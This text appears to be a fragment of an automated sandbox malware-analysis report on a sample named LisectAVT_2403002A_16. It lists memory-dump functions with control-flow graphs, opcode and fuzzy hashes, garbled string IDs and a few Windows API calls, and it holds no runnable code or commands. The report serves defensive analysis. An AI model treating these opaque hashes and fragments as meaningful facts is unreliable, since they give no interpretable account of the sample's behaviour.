                                                  control_flow_graph 1335 668c218-668c236 1336 668c238-668c23b 1335->1336 1337 668c248-668c24b 1336->1337 1338 668c23d-668c247 1336->1338 1339 668c27a-668c27d 1337->1339 1340 668c24d-668c275 1337->1340 1341 668c27f-668c28d 1339->1341 1342 668c294-668c297 1339->1342 1340->1339 1349 668c2cc-668c2e2 1341->1349 1350 668c28f 1341->1350 1343 668c299-668c2b5 1342->1343 1344 668c2ba-668c2bc 1342->1344 1343->1344 1347 668c2be 1344->1347 1348 668c2c3-668c2c6 1344->1348 1347->1348 1348->1336 1348->1349 1356 668c2e8-668c2f1 1349->1356 1357 668c513-668c51d 1349->1357 1350->1342 1359 668c51e-668c557 1356->1359 1360 668c2f7-668c31c 1356->1360 1363 668c559-668c55c 1359->1363 1376 668c500-668c50d 1360->1376 1377 668c322-668c352 1360->1377 1364 668c562-668c57a 1363->1364 1365 668c624-668c627 1363->1365 1386 668c584-668c587 1364->1386 1367 668c62d-668c63c 1365->1367 1368 668c88f-668c892 1365->1368 1379 668c65b-668c69f 1367->1379 1380 668c63e-668c659 1367->1380 1369 668c894-668c8b0 1368->1369 1370 668c8b5-668c8b7 1368->1370 1369->1370 1374 668c8b9 1370->1374 1375 668c8be-668c8c1 1370->1375 1374->1375 1375->1363 1382 668c8c7-668c8d0 1375->1382 1376->1356 1376->1357 1377->1376 1402 668c358-668c361 1377->1402 1389 668c863-668c878 1379->1389 1390 668c6a5-668c6b6 1379->1390 1380->1379 1392 668c58e-668c590 1386->1392 1389->1368 1398 668c6bc-668c6df 1390->1398 1399 668c84e-668c85d 1390->1399 1395 668c5a8-668c5ac 1392->1395 1396 668c592-668c598 1392->1396 1400 668c5ba 1395->1400 1401 668c5ae-668c5b8 1395->1401 1403 668c59a 1396->1403 1404 668c59c-668c59e 1396->1404 1398->1399 1419 668c6e5-668c808 1398->1419 1399->1389 1399->1390 1405 668c5bf-668c5c1 1400->1405 1401->1405 1402->1359 1406 668c367-668c389 1402->1406 1403->1395 1404->1395 1408 668c5d8-668c617 1405->1408 1409 668c5c3-668c5c6 1405->1409 1417 668c4ee-668c4fa 1406->1417 1418 668c38f-668c3b7 1406->1418 1408->1367 1428 668c619-668c623 1408->1428 1409->1382 1417->1376 1417->1402 1429 668c3bd-668c3e5 1418->1429 1430 668c4e4-668c4e9 1418->1430 1481 668c80a-668c814 1419->1481 1482 668c816 1419->1482 1429->1430 1437 668c3eb-668c419 1429->1437 1430->1417 1437->1430 1443 668c41f-668c429 1437->1443 1443->1430 1444 668c42f-668c469 1443->1444 1454 668c46b-668c46f 1444->1454 1455 668c474-668c490 1444->1455 1454->1430 1456 668c471 1454->1456 1455->1417 1457 668c492-668c4e2 1455->1457 1456->1455 1457->1417 1483 668c81b-668c81d 1481->1483 1482->1483 1483->1399 1484 668c81f-668c824 1483->1484 1485 668c832 1484->1485 1486 668c826-668c830 1484->1486 1487 668c837-668c839 1485->1487 1486->1487 1487->1399 1488 668c83b-668c847 1487->1488 1488->1399
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Uc<$$^q$$^q$c<$c<
                                                  • API String ID: 0-1836474973
                                                  • Opcode ID: f56751922a38e17706c21d58ae3b6170f3cf7f52836dd3dbc04dc43ef861be56
                                                  • Instruction ID: e2871868015e9e00f8c4fb8090086d5bcdd7e58f9710b4bd31bfcf8bb67064c3
                                                  • Opcode Fuzzy Hash: f56751922a38e17706c21d58ae3b6170f3cf7f52836dd3dbc04dc43ef861be56
                                                  • Instruction Fuzzy Hash: E602AF30F003169FDB54EBB8D4506AEB7E2AF84214F148669D406EB395EF74DC86CBA1
                                                  Function 06680040 Relevance: 2.7, Instructions: 2729COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4f394e64c2132df6a3160fda0f7301238923a64719eeab3a707734747ea0966b
                                                  • Instruction ID: f14b1a04e7eb3394953c0ce5ac856a33786cabeef0b41e87a53a5ff3a114a12f
                                                  • Opcode Fuzzy Hash: 4f394e64c2132df6a3160fda0f7301238923a64719eeab3a707734747ea0966b
                                                  • Instruction Fuzzy Hash: 50530531C10B1A8ECB51EF68C894599F7B1FF99300F55C79AE4587B221EB70AAC4CB81
                                                  Function 066894B0 Relevance: 1.9, Strings: 1, Instructions: 614COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $
                                                  • API String ID: 0-3993045852
                                                  • Opcode ID: 49b372b18ac2003f4d03ee79e00fd4abdf643a27db8b7aa21d371a17096715e4
                                                  • Instruction ID: b639c0399c0a17774690d6d36c95486e64770e79afcf241ec0b549e6e772e3fe
                                                  • Opcode Fuzzy Hash: 49b372b18ac2003f4d03ee79e00fd4abdf643a27db8b7aa21d371a17096715e4
                                                  • Instruction Fuzzy Hash: EA22AF35E002059FDF64EFB9C4846AEB7F2EF85314F20866AD55AAB344DA31DC42CB91
                                                  Function 06680006 Relevance: 1.8, Instructions: 1768COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 439bb842a1111a20f300b0a1200d8d15b85739469794c080102e350081d13353
                                                  • Instruction ID: 43bc4d634d25f6c3fcf067b90b42399d06c4573c3637214c57a6bed8b82da256
                                                  • Opcode Fuzzy Hash: 439bb842a1111a20f300b0a1200d8d15b85739469794c080102e350081d13353
                                                  • Instruction Fuzzy Hash: D613F531C10B1A8ECB51EF68C8805A9F7B1FF99300F55D79AE45877221EB70AAD5CB81
                                                  Function 0668A8F0 Relevance: .9, Instructions: 871COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7c067218ec27d12f9d85b885c43a72324ff2bed81d0958c2bc288b5ec6a93e6c
                                                  • Instruction ID: ae2d917f07bdb1fd0204fdbee54a28605b0a6b106df48d1a9db685d44b0735db
                                                  • Opcode Fuzzy Hash: 7c067218ec27d12f9d85b885c43a72324ff2bed81d0958c2bc288b5ec6a93e6c
                                                  • Instruction Fuzzy Hash: 37629030B002059FDB54EBB8D5946AEB7F2EF84314F14866AE806EB391DB75DC42CB91
                                                  Function 0668D718 Relevance: 11.5, Strings: 9, Instructions: 280COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 553 668d718-668d73d 554 668d73f-668d742 553->554 555 668d768-668d76b 554->555 556 668d744-668d763 554->556 557 668e1ad-668e1af 555->557 558 668d771-668d7b1 555->558 556->555 560 668e1b1 557->560 561 668e1b6-668e1b9 557->561 567 668d7db 558->567 568 668d7b3-668d7bf 558->568 560->561 561->554 563 668e1bf-668e1c9 561->563 569 668d7e1-668d817 567->569 570 668d7c9-668d7cf 568->570 571 668d7c1-668d7c7 568->571 576 668d822-668d824 569->576 572 668d7d9 570->572 571->572 572->569 577 668d83c-668d8c5 576->577 578 668d826-668d82c 576->578 590 668d90a-668d940 577->590 591 668d8c7-668d903 577->591 579 668d82e 578->579 580 668d830-668d832 578->580 579->577 580->577 598 668d942-668d97e 590->598 599 668d985-668d9bb 590->599 591->590 598->599 606 668d9bd-668d9f9 599->606 607 668da00-668da36 599->607 606->607 614 668da38-668da74 607->614 615 668da7b-668da89 607->615 614->615 616 668da99-668db10 615->616 617 668da8b-668da94 615->617 624 668db69-668db7e 616->624 625 668db12-668db36 616->625 617->563 624->557 630 668db58-668db67 625->630 631 668db38-668db4d 625->631 630->624 630->625 631->630
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $c<$kc<$uc<$}c<$$^q$$^q$$^q$$^q$c<
                                                  • API String ID: 0-206387987
                                                  • Opcode ID: 06610be9c5ab310afc4a828761c44ebf05715651a4d8d8f3eadcc9a2f62e7002
                                                  • Instruction ID: 0c413c935d9c687c3ffb632fc171b641aa09d5fe865e6a1a63018e8458c0ddba
                                                  • Opcode Fuzzy Hash: 06610be9c5ab310afc4a828761c44ebf05715651a4d8d8f3eadcc9a2f62e7002
                                                  • Instruction Fuzzy Hash: 8EC1FD70E002199FDB64EF65C95079EB7F6AF89304F5085AAC40DAB394DB709D82CFA1
                                                  Function 0668F5A0 Relevance: 10.4, Strings: 8, Instructions: 411COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 635 668f5a0-668f5be 636 668f5c0-668f5c3 635->636 637 668f5dd-668f5e0 636->637 638 668f5c5-668f5d8 636->638 639 668f5f1-668f5f4 637->639 640 668f5e2-668f5e6 637->640 638->637 641 668f608-668f60b 639->641 642 668f5f6-668f603 639->642 644 668f5ec 640->644 645 668f7e7-668f7f1 640->645 646 668f60d-668f61a 641->646 647 668f61f-668f622 641->647 642->641 644->639 646->647 649 668f62c-668f62f 647->649 650 668f624-668f629 647->650 652 668f631-668f64d 649->652 653 668f652-668f655 649->653 650->649 652->653 654 668f66f-668f672 653->654 655 668f657-668f660 653->655 658 668f7d8-668f7e1 654->658 659 668f678-668f67a 654->659 656 668f7f2-668f826 655->656 657 668f666-668f66a 655->657 666 668f828-668f82b 656->666 657->654 658->645 658->655 661 668f67c 659->661 662 668f681-668f684 659->662 661->662 662->636 663 668f68a-668f6b4 662->663 688 668f6ba-668f6cf 663->688 689 668f7d5 663->689 668 668f83a-668f83d 666->668 669 668f82d call 668fdad 666->669 670 668f843-668f87e 668->670 671 668fad7-668fada 668->671 673 668f833-668f835 669->673 679 668faa2-668fab5 670->679 680 668f884-668f890 670->680 674 668fadc-668fae6 671->674 675 668fae7-668faea 671->675 673->668 677 668fafb-668fafe 675->677 678 668faec-668faf0 675->678 682 668fb00-668fb1c 677->682 683 668fb21-668fb23 677->683 678->670 681 668faf6 678->681 687 668fab7 679->687 693 668f8b0-668f8f4 680->693 694 668f892-668f8ab 680->694 681->677 682->683 685 668fb2a-668fb2d 683->685 686 668fb25 683->686 685->666 692 668fb33-668fb3d 685->692 686->685 687->671 699 668f6d1-668f6d7 688->699 700 668f6e7-668f721 688->700 689->658 710 668f910-668f94f 693->710 711 668f8f6-668f908 693->711 694->687 701 668f6d9 699->701 702 668f6db-668f6dd 699->702 716 668f739-668f756 700->716 717 668f723-668f729 700->717 701->700 702->700 718 668f955-668fa61 710->718 719 668fa67-668fa7c 710->719 711->710 730 668f758-668f75e 716->730 731 668f76e-668f785 716->731 720 668f72b 717->720 721 668f72d-668f72f 717->721 718->719 719->679 720->716 721->716 733 668f760 730->733 734 668f762-668f764 730->734 739 668f79d-668f7ce 731->739 740 668f787-668f78d 731->740 733->731 734->731 739->689 741 668f78f 740->741 742 668f791-668f793 740->742 741->739 742->739
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                  • API String ID: 0-3823777903
                                                  • Opcode ID: f2d4108af59ffaad975fd984b4e1f41d8dbe6674ed8dda80a353fbca1fe51391
                                                  • Instruction ID: bfc7aae2bf0426b5dd5ce93bdaa8b6dadf3f321e542781ccab9c4595ad038524
                                                  • Opcode Fuzzy Hash: f2d4108af59ffaad975fd984b4e1f41d8dbe6674ed8dda80a353fbca1fe51391
                                                  • Instruction Fuzzy Hash: 7DE16D30E1030A8FDB68EFB9D4546AEB7F2AF85254F208629D405EB354EF71D846CB91
                                                  Function 0668D707 Relevance: 9.0, Strings: 7, Instructions: 214COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 766 668d707-668d73d 767 668d73f-668d742 766->767 768 668d768-668d76b 767->768 769 668d744-668d763 767->769 770 668e1ad-668e1af 768->770 771 668d771-668d781 768->771 769->768 773 668e1b1 770->773 774 668e1b6-668e1b9 770->774 778 668d78b-668d799 771->778 773->774 774->767 776 668e1bf-668e1c9 774->776 779 668d7a4-668d7b1 778->779 780 668d7db 779->780 781 668d7b3-668d7bf 779->781 782 668d7e1-668d7ff 780->782 783 668d7c9-668d7cf 781->783 784 668d7c1-668d7c7 781->784 788 668d809-668d817 782->788 785 668d7d9 783->785 784->785 785->782 789 668d822-668d824 788->789 790 668d83c-668d8c5 789->790 791 668d826-668d82c 789->791 803 668d90a-668d940 790->803 804 668d8c7-668d903 790->804 792 668d82e 791->792 793 668d830-668d832 791->793 792->790 793->790 811 668d942-668d97e 803->811 812 668d985-668d9bb 803->812 804->803 811->812 819 668d9bd-668d9f9 812->819 820 668da00-668da36 812->820 819->820 827 668da38-668da74 820->827 828 668da7b-668da89 820->828 827->828 829 668da99-668db10 828->829 830 668da8b-668da94 828->830 837 668db69-668db7e 829->837 838 668db12-668db36 829->838 830->776 837->770 843 668db58-668db67 838->843 844 668db38-668db4d 838->844 843->837 843->838 844->843
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $c<$kc<$uc<$}c<$$^q$$^q$c<
                                                  • API String ID: 0-2146872185
                                                  • Opcode ID: 48fe9b24bd5a2995587920823e155fa3f1cf57fbd12dff0955bd4754d482dc3f
                                                  • Instruction ID: 9a57d36f1c659aed1e6f9d6b74b44cba3d910fdf0d1c1341e65ed9a46a7898c4
                                                  • Opcode Fuzzy Hash: 48fe9b24bd5a2995587920823e155fa3f1cf57fbd12dff0955bd4754d482dc3f
                                                  • Instruction Fuzzy Hash: 2C910070E012199FDB64EF64D950BEEB7F6AF89304F5045AAC40DA7394DA309D81CFA1
                                                  Function 06688A70 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1601 6688a70-6688a94 1602 6688a96-6688a99 1601->1602 1603 6688aba-6688abd 1602->1603 1604 6688a9b-6688ab5 1602->1604 1605 6688ac3-6688b8e 1603->1605 1606 66891a5-66891a7 1603->1606 1604->1603 1625 6688b94-6688be1 1605->1625 1626 6688c16-6688c1d 1605->1626 1607 66891a9 1606->1607 1608 66891ae-66891b1 1606->1608 1607->1608 1608->1602 1610 66891b7-66891c4 1608->1610 1650 6688be6 call 6689320 1625->1650 1651 6688be6 call 6689330 1625->1651 1627 6688c23-6688c96 1626->1627 1628 6688ca4-6688cad 1626->1628 1647 6688c98 1627->1647 1648 6688ca1 1627->1648 1628->1610 1641 6688bec-6688c08 1644 6688c0a 1641->1644 1645 6688c13-6688c14 1641->1645 1644->1645 1645->1626 1647->1648 1648->1628 1650->1641 1651->1641
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fcq$XPcq$\Ocq
                                                  • API String ID: 0-3575482020
                                                  • Opcode ID: 876218a5f43ea66986cd31c5d649f2cdfc3789bff0f08d6a61887faa98d8b274
                                                  • Instruction ID: ad603df67e2d339bce71581ac97f75b69e756b760d5f29269a62f144f7d0d0ba
                                                  • Opcode Fuzzy Hash: 876218a5f43ea66986cd31c5d649f2cdfc3789bff0f08d6a61887faa98d8b274
                                                  • Instruction Fuzzy Hash: AE517470F002199FEB54ABB8C4147AEBAE7EB88740F504529D546EB384DEB54C02CF91
                                                  Function 06688A60 Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2188 6688a60-6688a94 2190 6688a96-6688a99 2188->2190 2191 6688aba-6688abd 2190->2191 2192 6688a9b-6688ab5 2190->2192 2193 6688ac3-6688b8e 2191->2193 2194 66891a5-66891a7 2191->2194 2192->2191 2213 6688b94-6688be1 2193->2213 2214 6688c16-6688c1d 2193->2214 2195 66891a9 2194->2195 2196 66891ae-66891b1 2194->2196 2195->2196 2196->2190 2198 66891b7-66891c4 2196->2198 2238 6688be6 call 6689320 2213->2238 2239 6688be6 call 6689330 2213->2239 2215 6688c23-6688c96 2214->2215 2216 6688ca4-6688cad 2214->2216 2235 6688c98 2215->2235 2236 6688ca1 2215->2236 2216->2198 2229 6688bec-6688c08 2232 6688c0a 2229->2232 2233 6688c13-6688c14 2229->2233 2232->2233 2233->2214 2235->2236 2236->2216 2238->2229 2239->2229
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fcq$XPcq
                                                  • API String ID: 0-936005338
                                                  • Opcode ID: 61fa0cf3133fb74bcfbb8856481e7a71aeef56e509fbafe409d2cd90d78271c7
                                                  • Instruction ID: 334dfea131db292eff3cbdb81f0f7c22bfd2537c3767c5bae3eab23011492da9
                                                  • Opcode Fuzzy Hash: 61fa0cf3133fb74bcfbb8856481e7a71aeef56e509fbafe409d2cd90d78271c7
                                                  • Instruction Fuzzy Hash: 0B417470B002199FEB54AFB8C4547AEBAE7EF88740F208529D545EB3D4DE748C02CB96
                                                  Function 0138AE98 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2895 138ae98-138af2c DuplicateHandle 2896 138af2e-138af34 2895->2896 2897 138af35-138af52 2895->2897 2896->2897
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0138AF1F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2901155834.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1380000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: ee1b61acb3954a4774c9d193338b814d96c4048f9825809debac483a679d63da
                                                  • Instruction ID: 2250210eb6e14a9b0329345c998328c067c8d36f687d624e407c1a2128e38c79
                                                  • Opcode Fuzzy Hash: ee1b61acb3954a4774c9d193338b814d96c4048f9825809debac483a679d63da
                                                  • Instruction Fuzzy Hash: 9721E4B59002489FDB10CFAAD984ADEFFF4EB48314F14841AE954A7350D374A944CFA5
                                                  Function 0138AE90 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2890 138ae90-138af2c DuplicateHandle 2891 138af2e-138af34 2890->2891 2892 138af35-138af52 2890->2892 2891->2892
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0138AF1F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2901155834.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1380000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: ae2a797d086e4461e40e74565c582ac34feba3bb2d52d43fc475f2c960c9d029
                                                  • Instruction ID: 763fa80d955a2a43f9c864abe7f6fe09d163a0e0028d096ded3471c60dc1cc9e
                                                  • Opcode Fuzzy Hash: ae2a797d086e4461e40e74565c582ac34feba3bb2d52d43fc475f2c960c9d029
                                                  • Instruction Fuzzy Hash: 642100B5D002089FDB10CFA9D984AEEBFF4EB48320F14845AE918A3250D374A944CFA5
                                                  Function 06603F71 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2900 6603f71-6603fb6 2902 6603fbe-6603fec GlobalMemoryStatusEx 2900->2902 2903 6603ff5-660401d 2902->2903 2904 6603fee-6603ff4 2902->2904 2904->2903
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 06603FDF
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912583579.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6600000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: ab6d14eee20be3667dcb9e9e101b9b7309acd12178da7066217ae14d0411d0b2
                                                  • Instruction ID: bc8d90c9b801ff8cb7fc493a1826e180837ed2e7dc90fc46d6348a400a3a1aca
                                                  • Opcode Fuzzy Hash: ab6d14eee20be3667dcb9e9e101b9b7309acd12178da7066217ae14d0411d0b2
                                                  • Instruction Fuzzy Hash: 9D1103B1C0025A9BCB10CF9AC445BDEFBF4AF48320F14816AE818B7341D778A944CFA6
                                                  Function 06603F78 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 06603FDF
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912583579.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6600000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 2c9e9b3da0be995f82dd12d933e15529173934e265af569f89e897631fb48697
                                                  • Instruction ID: b699b0a33bfebdd1b391ba07e653aa0c1b572e5b031041a13fc977923e0bba2d
                                                  • Opcode Fuzzy Hash: 2c9e9b3da0be995f82dd12d933e15529173934e265af569f89e897631fb48697
                                                  • Instruction Fuzzy Hash: CF11E2B1C0065A9BDB10DF9AC544BDEFBF4AF48324F14816AD818B7250D778A944CFA5
                                                  Function 06686185 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH^q
                                                  • API String ID: 0-2549759414
                                                  • Opcode ID: 4e4c6fb62affef60c251dde33f46f6338beaef8c43728397663d8cdae0be6f4b
                                                  • Instruction ID: bda60fe54a043b957d99ced450e55e407432dca83718e56c05df8ccd9cf62696
                                                  • Opcode Fuzzy Hash: 4e4c6fb62affef60c251dde33f46f6338beaef8c43728397663d8cdae0be6f4b
                                                  • Instruction Fuzzy Hash: 9641D530B003019FDB55AB74C8246AF76E7AF85200F644669E406DB395DF39DD46CBA1
                                                  Function 06686198 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH^q
                                                  • API String ID: 0-2549759414
                                                  • Opcode ID: ad47ea4a00aab045d2905c0d4590a78c923644af195a3fb6d8fc11fb41cbb5c7
                                                  • Instruction ID: b6abc6613c7220362f8274e1099a54f1dfeebc4b8761ae09514529ebb8bfbce6
                                                  • Opcode Fuzzy Hash: ad47ea4a00aab045d2905c0d4590a78c923644af195a3fb6d8fc11fb41cbb5c7
                                                  • Instruction Fuzzy Hash: F731B430B002058FDB59BB78C52466F76E7AFC5200F205679E006DB395EE79DC46CB91
                                                  Function 06688959 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: \Ocq
                                                  • API String ID: 0-2995510325
                                                  • Opcode ID: a68b85211103dcacec5ff9120112dc3b8363a8ede09281f8b547d876adc42ceb
                                                  • Instruction ID: 33a8125bc858a023cc1c0beec107273b0c3b8b9534c459970d9d8f28c85dc607
                                                  • Opcode Fuzzy Hash: a68b85211103dcacec5ff9120112dc3b8363a8ede09281f8b547d876adc42ceb
                                                  • Instruction Fuzzy Hash: 8DF0B730A5012ADFDB149FA4E859BAEBB72BF84700F604119E002A7294CBB51C41CB81
                                                  Function 0668FDAD Relevance: .4, Instructions: 354COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e871b11c4e3698fbb4b9626c35923bad872726e0181bcd7bab87b18d11283bf2
                                                  • Instruction ID: 0f266fc8cc856f322973de07398015617459dbfe923373e323bba4b53520b5ba
                                                  • Opcode Fuzzy Hash: e871b11c4e3698fbb4b9626c35923bad872726e0181bcd7bab87b18d11283bf2
                                                  • Instruction Fuzzy Hash: 82A16330F102099FDF64AABCC5947AEB6E6EB89350F204925E409EB395DA35DC81C762
                                                  Function 066832C8 Relevance: .3, Instructions: 276COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b3d84010f65753a8ddaee0b408c429d04ff02c0b0a25a80a189a25b7c908e9b8
                                                  • Instruction ID: 705931465baa4225a3fef9462e12a7ab6fa91c72d4a0f388da484ffff85b7f94
                                                  • Opcode Fuzzy Hash: b3d84010f65753a8ddaee0b408c429d04ff02c0b0a25a80a189a25b7c908e9b8
                                                  • Instruction Fuzzy Hash: 70A1D470F002129FDB15EFB8C480A6EBBA6FB84710F148669D456EB395DB35DC82C792
                                                  Function 06688169 Relevance: .2, Instructions: 246COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
